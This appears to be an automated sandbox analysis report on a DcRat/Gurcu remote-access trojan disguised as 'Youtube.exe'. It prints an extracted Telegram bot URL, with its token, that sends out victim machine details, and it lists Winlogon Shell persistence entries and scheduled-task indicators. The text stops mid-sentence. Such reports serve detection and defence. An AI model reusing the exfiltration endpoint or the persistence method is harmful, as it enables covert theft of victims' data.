Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-07-2024 13:00
Behavioral task
behavioral1
Sample
Youtube.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Youtube.exe
Resource
win10v2004-20240709-en
General
-
Target
Youtube.exe
-
Size
8.7MB
-
MD5
d25ebdfc04bdadea74017fa72f90781f
-
SHA1
f7278c4d04fc4db888368e0245d7607d8bcbb557
-
SHA256
9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
-
SHA512
77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71
-
SSDEEP
196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20e528f75fd273211ca4b0ac63578672932ff28b11%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20EHECWUZY%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CDriversavessessionDlldhcp%5CSearchHost.ex
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 1896 schtasks.exe 1692 schtasks.exe 2284 schtasks.exe 1980 schtasks.exe 2488 schtasks.exe 392 schtasks.exe 5156 schtasks.exe 4388 schtasks.exe 4880 schtasks.exe 4800 schtasks.exe 2436 schtasks.exe 2248 schtasks.exe 3372 schtasks.exe 232 schtasks.exe 4460 schtasks.exe 4428 schtasks.exe 236 schtasks.exe 424 schtasks.exe 4372 schtasks.exe 2736 schtasks.exe 4548 schtasks.exe 2440 schtasks.exe 4776 schtasks.exe 4696 schtasks.exe 784 schtasks.exe 2080 schtasks.exe 4880 schtasks.exe 3792 schtasks.exe 4388 schtasks.exe 3636 schtasks.exe 4764 schtasks.exe 2128 schtasks.exe 1876 schtasks.exe 1284 schtasks.exe 1952 schtasks.exe 5028 schtasks.exe 3084 schtasks.exe 4592 schtasks.exe 1760 schtasks.exe 1992 schtasks.exe 3012 schtasks.exe 2848 schtasks.exe 232 schtasks.exe 4956 schtasks.exe 1932 schtasks.exe 1684 schtasks.exe 1316 schtasks.exe 3124 schtasks.exe 4064 schtasks.exe 3240 schtasks.exe 1148 schtasks.exe 1292 schtasks.exe 3140 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings DCRatBuild.exe 1456 schtasks.exe 4964 schtasks.exe 4328 schtasks.exe 5932 schtasks.exe 5380 schtasks.exe 3232 schtasks.exe 4464 schtasks.exe 3936 schtasks.exe 700 schtasks.exe 808 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 23 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\", \"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\", \"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\csrss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\", \"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\", \"C:\\Users\\Admin\\Bloxstrap.exe\", \"C:\\winNet\\sihost.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\Idle.exe\", \"C:\\Users\\Admin\\Videos\\OfficeClickToRun.exe\", \"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\csrss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\", \"C:\\winNet\\RuntimeBroker.exe\", \"C:\\DriversavessessionDlldhcp\\SearchHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\Registry.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AIR\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\SppExtComObj.exe\", \"C:\\Windows\\PrintDialog\\Assets\\backgroundTaskHost.exe\", \"C:\\Users\\Default\\My Documents\\sppsvc.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\unsecapp.exe\", \"C:\\Windows\\SystemTemp\\Crashpad\\reports\\msiexec.exe\", \"C:\\winNet\\dllhost.exe\", \"C:\\winNet\\msiexec.exe\", \"C:\\Program Files\\Uninstall Information\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\wscript.exe\"" Refcrt.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3124 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 808 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1456 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1760 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 232 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 864 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3792 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4592 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4388 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4696 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3808 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4064 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4388 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2736 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4460 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3232 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3012 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1896 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3240 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1980 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1284 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4956 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2908 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1932 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1952 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4736 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2236 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5028 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3936 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 700 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2128 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4764 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2488 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3084 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4776 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2436 3980 schtasks.exe 97 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to 